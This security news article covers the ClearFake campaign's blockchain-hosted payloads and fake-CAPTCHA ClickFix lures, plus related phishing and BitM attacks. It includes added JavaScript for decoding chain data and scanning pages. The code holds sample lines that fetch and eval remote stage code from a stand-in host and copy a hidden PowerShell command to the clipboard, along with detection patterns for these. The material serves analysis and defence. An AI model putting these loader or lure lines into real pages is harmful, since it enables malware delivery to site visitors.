
Mar 19, 2025Ravie LakshmananCloud Security / Web Security

The threat actors behind the ClearFake campaign have been observed using fake reCAPTCHA or Cloudflare Turnstile verification prompts to trick users into downloading malware, including Lumma Stealer and Vidar Stealer.

ClearFake, a threat activity cluster first identified in July 2023, is known for using fake browser update lures on compromised WordPress sites as a malware distribution vector.

The campaign is also known for EtherHiding, a technique that stores the next-stage payload in Binance Smart Chain (BSC) smart contracts and retrieves it from there rather than from a conventional server. Because the data lives on a public blockchain, there is no hosting provider to issue a takedown request to and the operator can swap payloads by updating the contract, which makes the attack chain more resilient. The ultimate goal of these infection chains is to deliver information-stealing malware that targets both Windows and macOS systems.

Since May 2024, ClearFake attacks have incorporated a social engineering ploy known as ClickFix, which tricks users into running malicious PowerShell code themselves under the pretext of fixing a technical problem that does not exist.

According to Sekoia’s analysis, “Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain.”

“By using smart contract’s Application Binary Interfaces, these interactions involve loading multiple JavaScript codes and additional resources that fingerprint the victim’s system, as well as downloading, decrypting and displaying the ClickFix lure.”

The latest iteration of the ClearFake framework marks a significant evolution: it adopts Web3 capabilities to resist analysis and encrypts the ClickFix-related HTML code.

The updated multi-stage attack sequence begins when a victim visits a compromised site, which retrieves intermediate JavaScript code from BSC. That JavaScript fingerprints the system and then fetches the encrypted ClickFix code hosted on Cloudflare Pages.

Should the victim execute the malicious PowerShell command, it deploys Emmenhtal Loader (aka PEAKLIGHT), which in turn drops Lumma Stealer.

Sekoia observed an alternate ClearFake attack chain in late January 2025 that served a PowerShell loader responsible for installing Vidar Stealer. As of February 2025, at least 9,300 websites had been infected with ClearFake.

“The operator has consistently updated the framework code, lures, and distributed payloads on a daily basis,” it added. “ClearFake execution now relies on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands.”
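To make the EtherHiding step concrete, the following JavaScript is an added example written for this article, not code from ClearFake or from Sekoia's analysis. It shows the `eth_call` JSON-RPC request a page-side loader sends to a BSC node, and how the ABI-encoded `string` a contract getter returns is turned back into the kind of JavaScript or other stage data Sekoia describes as stored on the chain. The contract address, function selector and stage contents are constructed placeholders; this page does not identify the campaign's real contract or getter.

```javascript
// Added example for this article, not ClearFake or Sekoia code.
// All addresses, selectors and stage contents below are constructed placeholders.

// JSON-RPC body a loader sends to a BSC node. `selector` is the 4-byte function
// selector of the contract's getter (first 4 bytes of keccak256 of its signature);
// it is passed in as a string because Node's crypto module has no keccak256.
function buildEthCall(contractAddress, selector, blockTag = "latest") {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_call",
    params: [{ to: contractAddress, data: selector }, blockTag],
  };
}

// ABI-encode a single `string` return value: a head word holding the offset of
// the tail (always 32 for one dynamic value), a length word, then the UTF-8
// bytes right-padded to a 32-byte boundary.
function encodeAbiString(s) {
  const word = (n) => n.toString(16).padStart(64, "0");
  const data = Buffer.from(s, "utf8");
  const padded = Buffer.concat([data, Buffer.alloc((32 - (data.length % 32)) % 32)]);
  return "0x" + word(32) + word(data.length) + padded.toString("hex");
}

// Decode that encoding. Bounds are checked because a captured response may be
// truncated or deliberately malformed.
function decodeAbiString(hexResult) {
  const hex = hexResult.startsWith("0x") ? hexResult.slice(2) : hexResult;
  if (hex.length < 128 || hex.length % 64 !== 0) throw new Error("malformed ABI word stream");
  const buf = Buffer.from(hex, "hex");
  const offset = Number(BigInt("0x" + hex.slice(0, 64)));
  if (offset + 32 > buf.length) throw new Error("tail offset out of range");
  const length = Number(BigInt("0x" + hex.slice(offset * 2, offset * 2 + 64)));
  const start = offset + 32;
  if (start + length > buf.length) throw new Error("string length exceeds payload");
  return buf.subarray(start, start + length).toString("utf8");
}

// Triage helper: does the decoded chain data look like code meant to be executed?
function looksLikeScript(text) {
  return /\b(eval|Function|setTimeout|fetch|atob)\s*\(|createElement\(\s*["']script["']/.test(text);
}

function triageResponse(rpcResponse) {
  const code = decodeAbiString(rpcResponse.result);
  return { code, executable: looksLikeScript(code) };
}

// Constructed sample of what a loader receives from the node (placeholder values).
const SAMPLE_CONTRACT = "0x0000000000000000000000000000000000000000";
const SAMPLE_SELECTOR = "0x12345678";
const SAMPLE_STAGE = 'fetch("https://example.invalid/stage2.js").then(r=>r.text()).then(eval)';
const SAMPLE_RESPONSE = { jsonrpc: "2.0", id: 1, result: encodeAbiString(SAMPLE_STAGE) };

console.log(JSON.stringify(buildEthCall(SAMPLE_CONTRACT, SAMPLE_SELECTOR)));
console.log(triageResponse(SAMPLE_RESPONSE));
```

Decoding the response is also what a defender wants from a captured request: the blockchain is the hosting layer, so the current stage can be pulled and inspected from any BSC node without touching attacker infrastructure, and the same decoding applies to the AES key, lure URLs and PowerShell commands the quote above says are stored the same way.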

“The number of websites compromised by ClearFake suggests that this threat remains widespread and affects many users worldwide. In July 2024, […] approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.”
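As an added example, not Sekoia's tooling, the following Node.js scanner applies the two behaviours described above to a page's HTML: EtherHiding-style lookups against a BSC JSON-RPC endpoint inside injected scripts, and a ClickFix lure that pairs fake verification text with a clipboard write or an inline PowerShell command. The indicator regexes, including the `bsc-dataseed` host pattern, are assumptions based on public descriptions of the campaign rather than indicators from this article, and both sample pages are constructed.

```javascript
// Added example for this article, not ClearFake or Sekoia code.
// Indicator patterns are assumptions; tune them against real captures.

// EtherHiding: the loader has to reach a BSC node and issue eth_call.
const ETHERHIDING_INDICATORS = [
  { name: "eth_call JSON-RPC", re: /["']eth_call["']/ },
  // Assumption: public BSC endpoints are served from bsc-dataseed* hosts.
  { name: "BSC public RPC host", re: /bsc-dataseed\d*\./i },
  { name: "web3 library contract call", re: /\.methods\.\w+\(\)\.call\(|new\s+ethers\.Contract\(/ },
];

// ClickFix: a fake verification prompt plus a way to hand the victim a command.
const CLICKFIX_INDICATORS = [
  { name: "fake verification text", re: /verify (you are|you're) human|i'?m not a robot|turnstile|recaptcha/i },
  { name: "clipboard write", re: /navigator\.clipboard\.writeText\(|execCommand\(\s*["']copy["']/ },
  { name: "PowerShell command in page", re: /powershell(\.exe)?\s+(-\w+\s+)*-(enc|encodedcommand|ep|executionpolicy|w\s+hidden)/i },
  { name: "Win+R instructions", re: /\bwin(dows)?\s*\+\s*r\b/i },
];

// Pull the bodies of inline <script> elements out of the HTML.
function extractScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

function matchIndicators(text, indicators) {
  return indicators.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Scripts are checked for the chain lookup; the whole page is checked for the
// lure, since the verification text usually sits in markup, not in script.
function scanPage(html) {
  const etherhiding = new Set();
  for (const s of extractScripts(html)) {
    for (const name of matchIndicators(s, ETHERHIDING_INDICATORS)) etherhiding.add(name);
  }
  const clickfix = matchIndicators(html, CLICKFIX_INDICATORS);
  const verdicts = [];
  if (etherhiding.size > 0) verdicts.push("etherhiding-loader");
  // Verification text alone is normal (real reCAPTCHA widgets); a lure needs a
  // delivery path for the command as well.
  const delivers = clickfix.includes("clipboard write") || clickfix.includes("PowerShell command in page");
  if (clickfix.includes("fake verification text") && delivers) verdicts.push("clickfix-lure");
  return { etherhiding: [...etherhiding], clickfix, verdicts };
}

// Constructed sample of an injected page (placeholder contract, inert command).
const SAMPLE_INJECTED = `<html><head>
<script>const rpc="https://bsc-dataseed.binance.org/";
fetch(rpc,{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"0x0000000000000000000000000000000000000000",data:"0x12345678"},"latest"]})})
.then(r=>r.json()).then(j=>eval(decode(j.result)));</script>
</head><body><div class="cf-turnstile" id="v">Verify you are human</div>
<p>To verify, press Win + R, paste and press Enter</p>
<script>document.getElementById("v").onclick=()=>navigator.clipboard.writeText("powershell -w hidden -ep bypass -enc <base64>");</script>
</body></html>`;

// Constructed sample of a clean page with a genuine reCAPTCHA widget.
const SAMPLE_CLEAN = `<html><head><script>window.dataLayer=[];</script></head>
<body><h1>Welcome</h1><form><div class="g-recaptcha"></div></form></body></html>`;

console.log(scanPage(SAMPLE_INJECTED));
console.log(scanPage(SAMPLE_CLEAN));
```

Run it against the HTML of a site's front page (the injection is usually in the theme or a plugin file, so the scanner sees it as an inline script); a verdict should trigger a look at the WordPress file integrity, not just removal of the script.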

The development comes as over 100 auto dealership sites have been discovered compromised with ClickFix lures that lead to the deployment of SectopRAT malware.

“Where this infection on the auto dealerships happened was not on the dealership’s own website, but a third-party video service,” said security researcher Randy McEoin, who detailed some of the earliest ClearFake campaigns in 2023, describing the incident as an instance of a supply chain attack.

The video service in question is LES Automotive (“idostream[.]com”), which has since removed the malicious JavaScript injection from the site.

The findings also coincide with the discovery of several phishing campaigns that are engineered to push various malware families and conduct credential harvesting –

  • Using virtual hard disk (VHD) files embedded within archive file attachments in email messages to distribute Venom RAT by means of a Windows batch script
  • Using Microsoft Excel file attachments that exploit a known security flaw (CVE-2017-0199) to download an HTML Application (HTA) that then uses Visual Basic Script (VBS) to fetch an image, which contains another payload responsible for decoding and launching AsyncRAT and Remcos RAT
  • Exploiting misconfigurations in Microsoft 365 infrastructure to take control of tenants, create new administrative accounts, and deliver phishing content that bypasses email security protections and ultimately facilitates credential harvesting and account takeover (ATO)

As social engineering campaigns grow more sophisticated, organizations need authentication and access-control mechanisms that hold up against Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) techniques, which let attackers hijack accounts even when MFA is enabled. One-time codes and push approvals are simply relayed through the attacker's proxy or browser; phishing-resistant, origin-bound credentials such as FIDO2/WebAuthn, combined with short session lifetimes and checks that bind a session to the device that established it, are the controls that limit what a stolen session is worth.

“A pivotal benefit of employing a BitM framework lies in its rapid targeting capability, allowing it to reach any website on the web in a matter of seconds and with minimal configuration,” Google-owned Mandiant said in a report published this week.

“Once an application is targeted through a BitM tool or framework, the legitimate site is served through an attacker-controlled browser. This makes the distinction between a legitimate and a fake site exceptionally challenging for a victim. From the perspective of an adversary, BitM allows for a simple yet effective means of stealing sessions protected by MFA.”
